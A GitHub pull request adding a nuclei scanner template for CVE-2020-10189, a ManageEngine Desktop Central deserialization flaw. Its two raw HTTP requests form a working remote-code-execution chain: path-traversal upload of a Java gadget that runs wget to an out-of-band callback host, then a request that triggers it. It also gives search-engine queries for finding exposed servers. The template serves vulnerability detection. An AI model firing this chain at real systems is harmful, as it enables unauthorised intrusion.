Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CVE-2020-10189 #9591

Merged
Merged
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
69 changes: 69 additions & 0 deletions http/cves/2020/CVE-2020-10189.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,69 @@
id: CVE-2020-10189

info:
name: ManageEngine Desktop Central Java Deserialization
author: king-alexander
severity: critical
description: |
Zoho ManageEngine Desktop Central before 10.0.474 is vulnerable to a deserialization of untrusted data, which permits remote code execution.
remediation: |
Apply updates per vendor instructions.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2020-10189
- https://blog.reconinfosec.com/analysis-of-exploitation-cve-2020-10189
- https://www.manageengine.com/products/desktop-central/remote-code-execution-vulnerability.html
- https://y4er.com/posts/cve-2020-10189-zoho-manageengine-rce/
- https://cwe.mitre.org/data/definitions/502.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2020-10189
cwe-id: CWE-502
epss-score: 0.97206
epss-percentile: 0.99826
cpe: cpe:2.3:a:zohocorp:manageengine_desktop_central:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: zohocorp
product: manageengine_desktop_central
fofa-query:
- body="manageengine desktop central 10"
- title="manageengine desktop central 10"
- app="zoho-manageengine-desktop"
shodan-query: http.title:"manageengine desktop central 10"
google-query: intitle:"manageengine desktop central 10"
tags: cve,cve2020,kev,zoho,manageengine,deserialization,intrusive

flow: http(1) && http(2)

http:
- raw:
- |
POST /mdm/client/v1/mdmLogUploader?udid=si%5C..%5C..%5C..%5Cwebapps%5CDesktopCentral%5C_chart&filename=logger.zip HTTP/1.1
Host: {{Hostname}}
Content-Type: application/octet-stream

{{generate_java_gadget("commons-collections3.1","wget http://{{interactsh-url}}","raw")}}

matchers:
- type: status
status:
- 200
internal: true

- raw:
- |
GET /cewolf/?img=%5Clogger.zip HTTP/1.1
Host: {{Hostname}}

matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "dns"

- type: status
status:
- 200
Loading